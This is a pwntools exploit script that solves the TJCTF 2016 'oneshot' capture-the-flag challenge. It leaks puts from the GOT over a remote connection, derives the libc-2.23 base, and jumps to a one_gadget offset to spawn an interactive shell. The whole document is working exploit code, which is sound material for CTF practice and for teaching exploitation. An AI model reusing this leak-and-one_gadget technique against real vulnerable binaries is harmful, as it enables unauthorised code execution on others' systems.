oneshot_tjctf_2016

exp (exploit script; pwntools, libc-2.23 one_gadget)

from pwn import *

#context.log_level ='debug'

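# Target binary and the libc it was served with.  The libc version matters:
# the one_gadget offsets below are only valid for this exact libc build.
BINARY = './oneshot_tjctf_2016'
LIBC = './libc/libc-2.23.so'

# Candidate one_gadget offsets inside LIBC.  Each gadget only works when its
# own register/stack constraint (as printed by the one_gadget tool) happens
# to hold when control reaches it, so a single attempt may fail; retry with
# another index via `GADGET=<n>` on the command line instead of editing the
# script.
one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]


def start():
    """Return a tube to the target: a local process with `LOCAL`, else remote."""
    if args.LOCAL:
        return process(BINARY)
    return remote('node3.buuoj.cn', 26930)


def main():
    """Leak puts@libc through the read prompt, then send a one_gadget address.

    The target asks for a location to read (prompt "Read location?") and
    afterwards accepts a second number, which this script feeds a libc
    address to -- presumably the jump target ("one shot": there is no second
    leak), so the leak is sanity-checked before anything is sent back.
    """
    elf = ELF(BINARY)
    libc = ELF(LIBC)
    io = start()

    # Step 1: ask for puts' GOT slot -> leaks puts' runtime address in libc.
    puts_got = elf.got['puts']
    io.sendlineafter(b'Read location?', str(puts_got).encode())

    # Anchor on '0x0000': this assumes the value is printed as zero-padded
    # 16-nibble hex, where an x86-64 userland libc address starts 0x00007f...
    # (matches the original exploit; re-check against the binary if the
    # output format differs).
    io.recvuntil(b'0x0000')
    puts_addr = int(io.recvline().strip(), 16)
    log.info('puts@libc = %#x' % puts_addr)

    libc_base = puts_addr - libc.symbols['puts']
    # libc is mmap'd page-aligned: a non-aligned base means the leak was
    # mis-parsed or ./libc/libc-2.23.so is not the remote libc.  Abort
    # (log.error raises) rather than spend the single jump on garbage.
    if libc_base & 0xfff:
        log.error('libc base %#x is not page-aligned: bad leak or wrong libc' % libc_base)
    log.success('libc base = %#x' % libc_base)

    # Step 2: pick a gadget (default: the first one) and hand its absolute
    # address to the program as the second number.
    index = int(args.GADGET or 0)
    target = libc_base + one_gadget[index]
    log.info('using one_gadget[%d] = %#x' % (index, target))
    io.sendline(str(target).encode())

    io.interactive()


if __name__ == '__main__':
    main()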
